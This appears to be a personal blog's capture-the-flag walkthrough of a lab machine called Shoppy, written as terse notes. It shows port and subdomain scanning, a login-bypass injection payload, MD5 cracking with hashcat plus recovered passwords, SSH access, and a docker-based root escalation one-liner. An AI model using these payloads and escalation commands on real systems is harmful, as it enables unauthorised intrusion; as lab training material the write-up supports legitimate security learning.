CTF Choppy

CTF Linux
Created At :
Count:435 Views 👀 :
  1. Rustscan
  2. /etc/hosts
  3. Port 80
    1. Subdomain listing
    2. Gobuster
    3. Login page
    4. Bypass auth login page
    5. Searsh for user
    6. Crack the password
  4. Mattermost
  5. jaeger
  6. deploy

Rustscan

rustscan -a 10.10.11.180

Output:

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack
80/tcp   open  http    syn-ack
9093/tcp open  copycat syn-ack

/etc/hosts

echo "10.10.11.180 shoppy.htb" >> /etc/hosts

Port 80

Subdomain listing

wfuzz -c -f subdomains -w /usr/share/wordlists/wfuzz/others/subdomains.txt -u 'http://shoppy.htb' -H "Host: FUZZ.shoppy.htb" --hw 9000 --sc 200

Add mattermost.shoppy.htb to /etc/hosts

Gobuster

gobuster dir -u http://shoppy.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard switch

Output:

/images               (Status: 301) [Size: 179] [--> /images/]
/login                (Status: 200) [Size: 1074]              
/admin                (Status: 302) [Size: 28] [--> /login]   
/assets               (Status: 301) [Size: 179] [--> /assets/]
/css                  (Status: 301) [Size: 173] [--> /css/]   
/Login                (Status: 200) [Size: 1074]              
/js                   (Status: 301) [Size: 171] [--> /js/]    
/fonts                (Status: 301) [Size: 177] [--> /fonts/] 
/Admin                (Status: 302) [Size: 28] [--> /login]   
/exports              (Status: 301) [Size: 181] [--> /exports/]
/LogIn                (Status: 200) [Size: 1074]               
/LOGIN                (Status: 200) [Size: 1074]

Login page

http://shoppy.htb/login

You can bypass the login page
I will use burpsuite to intercept the trafic.

While I was playing with burpsuite I go an interesting error:

We have an username jaeger.
/home/jaeger/ShoppyApp/node_modules/body-parser/lib/types/json.js

Bypass auth login page

When I put a ‘ the page take more time to load.
https://book.hacktricks.xyz/pentesting-web/login-bypass/sql-login-bypass
I from this liste I took this '||'2 and add admin at the beggining.

Searsh for user

I have to search for a user, it’s not working with jaeger.

I enter '||'2 to find a new user, josh.

Crack the password

This is a hash, probably MD5.
6ebcea65320589ca4f2f1ce039975995
https://www.dcode.fr/cipher-identifier 

echo "6ebcea65320589ca4f2f1ce039975995" > hash      
hashcat -m 0 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

remembermethisway

Mattermost

http://mattermost.shoppy.htb/login

jaeger is a linux user, I saw him in the error with burpsuite.
Let’s use ssh.

jaeger

ssh jaeger@shoppy.htb

sudo -l 

sudo -u deploy /home/deploy/password-manager

I don’t have the password, if I use strings I see nothing but with cat it’s working.

Sample

deploy

ssh deploy@shoppy.htb

Deploying@pp!
I’m using lse again.

I can use docker, I can also exploit it with GTFOBins.
https://gtfobins.github.io/gtfobins/docker/

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

I’m root

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme